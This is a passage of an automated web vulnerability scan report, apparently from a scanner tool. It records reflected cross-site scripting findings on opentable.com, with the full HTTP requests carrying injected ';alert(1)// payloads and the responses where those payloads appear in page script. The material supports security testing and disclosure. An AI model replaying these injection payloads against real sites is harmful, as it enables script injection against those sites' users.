This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=902e5d7'%3balert(1)//598a6a122be&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a53&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Vary: Accept-Encoding
Content-Length: 38316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
, 'mapimage':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=902e5d7';alert(1)//598a6a122be&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.P
...[SNIP]...

3.13. http://www.opentable.com/opentables.aspx [rtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the rtype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 579ed'%3balert(1)//e3acda3f130 was submitted in the rtype parameter. This input was echoed as 579ed';alert(1)//e3acda3f130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod579ed'%3balert(1)//e3acda3f130 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref''&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=duSsdwBsMHJDxcQVxTQ3GQ%3d%3d&ts=3&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref''&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=duSsdwBsMHJDxcQVxTQ3GQ%3d%3d&ts=3&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref''&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=duSsdwBsMHJDxcQVxTQ3GQ%3d%3d&ts=3&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46298


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod579ed';alert(1)//e3acda3f130&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new H
...[SNIP]...

3.14. http://www.opentable.com/opentables.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cad25'%3balert(1)//adac89be721 was submitted in the t parameter. This input was echoed as cad25';alert(1)//adac89be721 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=singlecad25'%3balert(1)//adac89be721&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:56 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a56&p1q=rid%3d20076a25%2500%250d%250aadc5f31fe0d%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:56 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
'7:00 PM';
ResultProperties.Request.PartySize = 2;
ResultProperties.Request.Action = '';
ResultProperties.Request.DateTime = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Request.SearchType = 'singlecad25';alert(1)//adac89be721';
ResultProperties.Request.SearchDate = '10%2f3%2f2011+7%3a00+PM';
ResultProperties.Response.ResultsType = 5;
ResultProperties.Response.IsWhiteLabelRestRefSearch = true;
ResultProperties.Response.
...[SNIP]...

3.15. http://www.opentable.com/restaurant-search.aspx [PartySize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the PartySize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe644'%3balert(1)//a056217db90 was submitted in the PartySize parameter. This input was echoed as fe644';alert(1)//a056217db90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2fe644'%3balert(1)//a056217db90&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a48&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=B%2b4yJc5Xdhu23AvYwCmwLA%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
